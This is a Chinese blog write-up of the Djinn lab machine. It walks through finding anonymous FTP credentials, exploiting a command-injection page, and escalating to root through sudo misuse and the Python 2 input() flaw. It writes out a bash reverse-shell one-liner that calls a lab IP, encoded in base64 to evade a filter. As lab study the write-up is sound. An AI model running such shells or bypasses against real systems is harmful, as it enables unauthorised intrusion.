
Djinn

靶机发现端口信息枚举
nmap扫描结果如下:
端口探测&服务探测
开放了3个端口,21,1337,7331,根据扫描结果知道目标ftp可以使用匿名登录,我们先看看
使用ftp命令登录上去,通过get批量下载目标文件到本地,查看到如下结果:
下下来的文件没什么有用的,有个creds.txt里面是mitu:81229也不知道有什么用
1 | creds.txt |
1337端口
打开会让你进行一个游戏的玩,太菜了不会写脚本看零佬是用了pwn库看着好方便啊。
用kimi写了一个能用的脚本
web服务探测
接着,我们对运行http服务的7331端口进行目录扫描,看看能否发现隐藏的目录。
果不其然,通过目录扫描发现了“/wish”和“/genie”两个目录,依次访问一下。发现“/genie”目录报了403,没有访问权限;而“/wish“目录是一个类似命令执行的页面。
在输入框中输入“id”,页面跳转到了“/genie”,并成功执行了命令。
漏洞利用
直接写上反弹命令提示命令被过滤需要绕过
1 | echo "bash -c 'exec bash -i &>/dev/tcp/192.168.55.128/4444 <&1'" | base64 |
得到编码过后的结果,然后用
1 | echo "加密字符串" |base64 -d |bash |
这行命令url编码后发送并在本地开启监听端口
成功弹到shell:www-data
立足点获取
当前权限几乎没任何提权的能力,发现passwd下面有两个用户
nitish之前收集到过一些信息尝试着枚举了一下密码之类的东西,发现没有正确的。
一头雾水的时候搜了一下creds.txt这个文件,发现了在他的家目录下面有个隐藏文件夹中存在明文的密码
1 | su nitish |
转到用户权限
机器信息收集
sudo信息
1 | sudo -l |
查询发现可以无密码
————下面开始就是另外师傅的东西了,我当时没有思路了—————
使用下面的语句查看一下genie的用法,注意:使用genie -h 可能无法查看全部的用法,发现-p和-cmd两个参数可以执行shell命令
1 | man genie |
之后我执行了下面的语句,但是并没有拿到sam的shell
1 | sudo -u sam /usr/bin/genie -p "/bin/sh" |
但是我使用-cmd参数,执行下面的命令后,成功获得了sam的shell
1 | sudo -u sam /usr/bin/genie -cmd whoami |
再次执行
1 | sudo -l |
查看sudo可以执行的命令,得到了下面的结果
但是执行这条语句之后没有得到有价值的信息,反而让我更加懵逼。。。接着使用下面的命令查找了一下可写的文件,发现了一个/home/sam/.pyc文件,就是进行加密后的python文件。
1 | find / -writable -type f 2>/dev/null |
然后将.pyc文件导出到kali中,进行在线反编译,网址:https://tool.lu/pyc/。反编译之后得到了如下代码:
1 | #!/usr/bin/env python |
仔细审计之后发现这里的input函数,可以确定是python2的版本。搜一下python input() vulnerability,看看input函数的漏洞。果然还是被👴发现了,参考文章:https://www.geeksforgeeks.org/vulnerability-input-function-python-2-x/
根据这个漏洞,可以把变量名当成变量的内容来解析,我们可以直接在Guess the number中输入“num“利用此漏洞即可。至此,我们获得了root权限。
总结复盘
打靶过程中没顺便写wp图片啥的都是偷别的师傅的,这靶机提权思路有点东西。python2的input漏洞也确实没有任何知识储备可言。
活该我打不出来!!!
学到了什么?一点思考是之前有命令执行但是被过滤的情况我第一个想到了这个项目
https://probiusofficial.github.io/bashFuck/
之前打CTF时候遇到过极限命令执行,但是从来没有实践过,想着这次终于能用了,结果绕过了之后执行没任何效果。不知道问题出在哪了。要是后来有师傅能看到这里了的话请务必GitHub上提个issue告诉我一下
- Title: Djinn
- Author: EnchanterW
- Created at : 2025-04-11 16:00:00
- Updated at : 2025-09-20 20:06:49
- Link: https://enchanter-w.github.io/2025/04/11/Djinn/
- License: This work is licensed under CC BY-NC-SA 4.0.